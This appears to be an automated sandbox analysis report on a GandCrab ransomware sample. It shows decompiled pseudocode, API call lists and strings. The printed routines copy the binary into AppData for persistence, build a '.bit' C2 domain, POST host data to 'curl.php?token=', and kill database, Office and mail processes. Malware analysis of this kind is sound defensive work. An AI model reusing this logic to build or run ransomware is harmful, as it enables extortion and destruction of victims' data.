0x0f1d5636
0x0f1d5642
0x0f1d564e
0x0f1d5650
0x0f1d5655
0x0f1d5658
0x0f1d5658
0x0f1d5666
0x0f1d5666
0x0f1d5503
0x0f1d5508
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0F1D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F1D7EC4
Part of subcall function 0F1D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F1D7EDD

Part of subcall function 0F1D5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0F1D50C6
Part of subcall function 0F1D5060: Sleep.KERNEL32(000003E8), ref: 0F1D5103
Part of subcall function 0F1D5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1D5111
Part of subcall function 0F1D5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1D5121
Part of subcall function 0F1D5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1D513D
Part of subcall function 0F1D5060: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D514E
Part of subcall function 0F1D5060: wsprintfW.USER32 ref: 0F1D5166
Part of subcall function 0F1D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D5177

lstrlenA.KERNEL32(00000000,77296980,00000000,00000000), ref: 0F1D54C5
VirtualAlloc.KERNEL32(00000000,77296981,00003000,00000040), ref: 0F1D54E5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F1D54FA
lstrcatA.KERNEL32(00000000,data=), ref: 0F1D5518
lstrcatA.KERNEL32(00000000,0F1D582E), ref: 0F1D551E
lstrlenA.KERNEL32(00000000), ref: 0F1D5572
_memset.LIBCMT ref: 0F1D558D
lstrcpyW.KERNEL32 ref: 0F1D55A1
lstrlenW.KERNEL32(?), ref: 0F1D55B9
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0F1D55D9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0F1D5636
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F1D5642
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F1D564E
InternetCloseHandle.WININET(?), ref: 0F1D5658

Strings

POST, xrefs: 0F1D55CA
curl.php?token=, xrefs: 0F1D559B
data=, xrefs: 0F1D5512

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: b43e70e290d2d4a4cd9b1b15c4944dffb914e4a1ebac9c3495d3cc038c0501dd
Instruction ID: 7910b397b49c2c6da7dc304f1e9656064c514d2d866c83792db57ec55666d63e
Opcode Fuzzy Hash: b43e70e290d2d4a4cd9b1b15c4944dffb914e4a1ebac9c3495d3cc038c0501dd
Instruction Fuzzy Hash: 4651E5B1E0231AABDB10DBA4DC40FEEBB7DBF88301F144515FA44B2142EB786694CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F1D2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F1D8090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F1D8150( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F1D8090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F1D2890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F1D2960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0f1d2ad6
0x0f1d2aea
0x0f1d2af0
0x0f1d2af4
0x0f1d2af6
0x0f1d2b00
0x0f1d2b1c
0x0f1d2b1e
0x0f1d2b1e
0x0f1d2b02
0x0f1d2b02
0x0f1d2b02
0x0f1d2b08
0x0f1d2b10
0x0f1d2b12
0x0f1d2b14
0x0f1d2b14
0x0f1d2b28
0x0f1d2b2c
0x0f1d2b38
0x0f1d2b3e
0x0f1d2b43
0x0f1d2b48
0x0f1d2b4a
0x0f1d2b55
0x0f1d2b62
0x0f1d2b67
0x0f1d2b6c
0x0f1d2b75
0x0f1d2b89
0x0f1d2b8e
0x0f1d2b9c
0x0f1d2ba2
0x0f1d2ba5
0x0f1d2ba7
0x0f1d2bac
0x0f1d2bae
0x0f1d2be4
0x0f1d2bec
0x0f1d2bf4
0x0f1d2bf6
0x0f1d2bfd
0x0f1d2c02
0x0f1d2c05
0x0f1d2c07
0x00000000
0x00000000
0x0f1d2c0f
0x0f1d2c11
0x0f1d2c16
0x0f1d2c1d
0x0f1d2c2c
0x0f1d2c2c
0x0f1d2c2c
0x0f1d2c2e
0x0f1d2c2e
0x0f1d2c2f
0x0f1d2c35
0x0f1d2c3b
0x00000000
0x0f1d2c3d
0x0f1d2c25
0x0f1d2c2a
0x00000000
0x00000000
0x00000000
0x0f1d2c2a
0x0f1d2bb6
0x0f1d2bb8
0x0f1d2bbd
0x0f1d2bc4
0x0f1d2bd3
0x0f1d2bd3
0x0f1d2bd3
0x0f1d2bd5
0x0f1d2bd5
0x00000000
0x0f1d2bd5
0x0f1d2bcc
0x0f1d2bd1
0x00000000
0x00000000
0x00000000
0x0f1d2b4c
0x0f1d2b4c
0x0f1d2c40
0x0f1d2c40
0x0f1d2c45
0x0f1d2c47
0x0f1d2c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F1D2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F1D2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F1D2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F1D2B7D

Part of subcall function 0F1D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1D816D
Part of subcall function 0F1D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1D819B
Part of subcall function 0F1D8150: GetModuleHandleA.KERNEL32(?), ref: 0F1D81EF
Part of subcall function 0F1D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1D81FD
Part of subcall function 0F1D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1D820C
Part of subcall function 0F1D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D8255
Part of subcall function 0F1D8150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D8263

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F1D2B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F1D2BE4
lstrcatW.KERNEL32(00000000,?), ref: 0F1D2BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0F1D2BF4
wsprintfW.USER32 ref: 0F1D2C35
ExitThread.KERNEL32 ref: 0F1D2C47

Strings

\Microsoft\, xrefs: 0F1D2BDE
I, xrefs: 0F1D2B6C
P, xrefs: 0F1D2B55
U, xrefs: 0F1D2B75
.exe, xrefs: 0F1D2BEE
"%s", xrefs: 0F1D2C2F
AppData, xrefs: 0F1D2B97

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 825600ef0ea767134f2d80c8ffa3665c2bb97affb9e57cf4ed38577b5c7e9ed5
Instruction ID: 5c8daba638743f6bc9017729f465d6f6abe7009bb63c5286e0975793639cd06e
Opcode Fuzzy Hash: 825600ef0ea767134f2d80c8ffa3665c2bb97affb9e57cf4ed38577b5c7e9ed5
Instruction Fuzzy Hash: 1741F7702053119FE304DF20DC49B5F7BF8AF84715F044428F56696283DBB8E969CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0F1D5060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				void* _t30;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf1e04c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xf1e04d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8); // executed
						}
						_t30 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4); // executed
						_t39 = _t30;
						_t41 = _t39; // executed
						E0F1D4E90(_t41, _v12, _t48); // executed
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000); // executed
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0f1d5066
0x0f1d5076
0x0f1d5081
0x0f1d5086
0x0f1d508c
0x0f1d509b
0x0f1d50a1
0x0f1d50a6
0x0f1d50aa
0x0f1d50b1
0x0f1d50b8
0x0f1d50bf
0x0f1d50c3
0x0f1d50c6
0x0f1d50cc
0x0f1d50ce
0x0f1d50d3
0x0f1d50d9
0x0f1d50db
0x0f1d50e0
0x0f1d50e2
0x0f1d50e2
0x0f1d50e6
0x0f1d50e7
0x0f1d50ed
0x0f1d50f2
0x0f1d50f4
0x0f1d50f7
0x0f1d50f7
0x0f1d50fc
0x0f1d5103
0x0f1d5103
0x0f1d5121
0x0f1d512a
0x0f1d512d
0x0f1d512f
0x0f1d5134
0x0f1d513d
0x0f1d5145
0x00000000
0x00000000
0x0f1d514e
0x0f1d5154
0x0f1d5157
0x0f1d5157
0x0f1d515c
0x0f1d5166
0x0f1d5177
0x0f1d517d
0x0f1d517d
0x0f1d5185

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0F1D50C6
Sleep.KERNEL32(000003E8), ref: 0F1D5103
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1D5111
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1D5121
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1D513D
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D514E
wsprintfW.USER32 ref: 0F1D5166
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D5177

Strings

gand, xrefs: 0F1D50AA
n, xrefs: 0F1D509B
crab, xrefs: 0F1D50B1
fabian wosar <3, xrefs: 0F1D5137
.bit, xrefs: 0F1D50B8

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$crab$fabian wosar <3$gand$n
API String ID: 2709691373-4182624408
Opcode ID: 337176b737aa9e10287e2b378240b3b2e95c817509f58ec4891b6aff34bce7d1
Instruction ID: 185b5fed0130c20ad6aac33cfcdc2b804ff59d266bb9da5d4f711db2b11de601
Opcode Fuzzy Hash: 337176b737aa9e10287e2b378240b3b2e95c817509f58ec4891b6aff34bce7d1
Instruction Fuzzy Hash: E7310771E01319ABDB01CFA8DC85BEEBBB8EF44715F100125FA06B7282D7B51A508B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D46F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0F1D46F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0f1d46f6
0x0f1d4703
0x0f1d470b
0x0f1d4713
0x0f1d471b
0x0f1d4723
0x0f1d472b
0x0f1d4733
0x0f1d473b
0x0f1d4743
0x0f1d474b
0x0f1d4753
0x0f1d475b
0x0f1d4763
0x0f1d476b
0x0f1d4773
0x0f1d477b
0x0f1d4783
0x0f1d478b
0x0f1d4793
0x0f1d479b
0x0f1d47a3
0x0f1d47ab
0x0f1d47b3
0x0f1d47bb
0x0f1d47c3
0x0f1d47cb
0x0f1d47d3
0x0f1d47de
0x0f1d47e9
0x0f1d47f4
0x0f1d47ff
0x0f1d480a
0x0f1d4815
0x0f1d4820
0x0f1d482b
0x0f1d4836
0x0f1d4841
0x0f1d484c
0x0f1d4857
0x0f1d4862
0x0f1d4874
0x0f1d4878
0x0f1d487c
0x0f1d4882
0x0f1d4886
0x0f1d4888
0x0f1d4891
0x0f1d4893
0x0f1d4895
0x0f1d4895
0x0f1d4891
0x0f1d48a1
0x0f1d48a1
0x0f1d48a4
0x0f1d48a4
0x0f1d48b0
0x0f1d48b5
0x0f1d48bd
0x0f1d48cb
0x0f1d48cf
0x0f1d48d4
0x0f1d48e1
0x0f1d48e1
0x0f1d48cf
0x0f1d48eb
0x0f1d48ec
0x0f1d48ec
0x0f1d48ef
0x0f1d48f4
0x0f1d48fa
0x0f1d4900
0x0f1d4900
0x0f1d4903
0x0f1d4909
0x0f1d4913
0x0f1d4913
0x0f1d491a
0x0f1d4922

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F1D4862
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F1D487C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F1D4895
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F1D48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F1D48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F1D48D4
CloseHandle.KERNEL32(00000000), ref: 0F1D48E1
Process32NextW.KERNEL32(?,00000000), ref: 0F1D48FA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D4913
FindCloseChangeNotification.KERNEL32(?), ref: 0F1D491A

Strings

i)w, xrefs: 0F1D48B5

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3023235786-1280834553
Opcode ID: 60d75602ed8d9c2afa58b7c960fc132013a6f8eefd4ec793add6eeb773c425e7
Instruction ID: 4f081eb104f0a6dd68a8604c7e6bd2da9237d5ef0b745efccde224fe7a6e95aa
Opcode Fuzzy Hash: 60d75602ed8d9c2afa58b7c960fc132013a6f8eefd4ec793add6eeb773c425e7
Instruction Fuzzy Hash: CA5157B51093809FD720CF559A4878BBBF8BF81718F50490CF59A6B252C7709A2ACF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F1D39F0: GetProcessHeap.KERNEL32(?,?,0F1D4637,00000000,?,00000000,00000000), ref: 0F1D3A8C

Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1D7357
Part of subcall function 0F1D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1D7368
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1D7386
Part of subcall function 0F1D7330: GetComputerNameW.KERNEL32 ref: 0F1D7390
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D73B0
Part of subcall function 0F1D7330: wsprintfW.USER32 ref: 0F1D73F1
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D740E
Part of subcall function 0F1D7330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F1D7432
Part of subcall function 0F1D7330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F1D4640,?), ref: 0F1D7456
Part of subcall function 0F1D7330: RegCloseKey.KERNEL32(00000000), ref: 0F1D7472

Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7192
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D719D
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71B3
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71BE
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71D4
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71DF
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71F5
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(0F1D4966,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7200
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7216
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7221
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7237
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7242
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7261
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D726C

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D465C
lstrcpyW.KERNEL32 ref: 0F1D467F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4686
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D469E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46AA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46CB

Strings

Global\, xrefs: 0F1D4679

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: e46040dec5b6a66fdbf3e8ab3651499f9770bff48e6e8c96969f74010dd987ad
Instruction ID: 49c3c3ae55de15470e8954dbced70f3cdc16762144146af8beab37689ecd6c7a
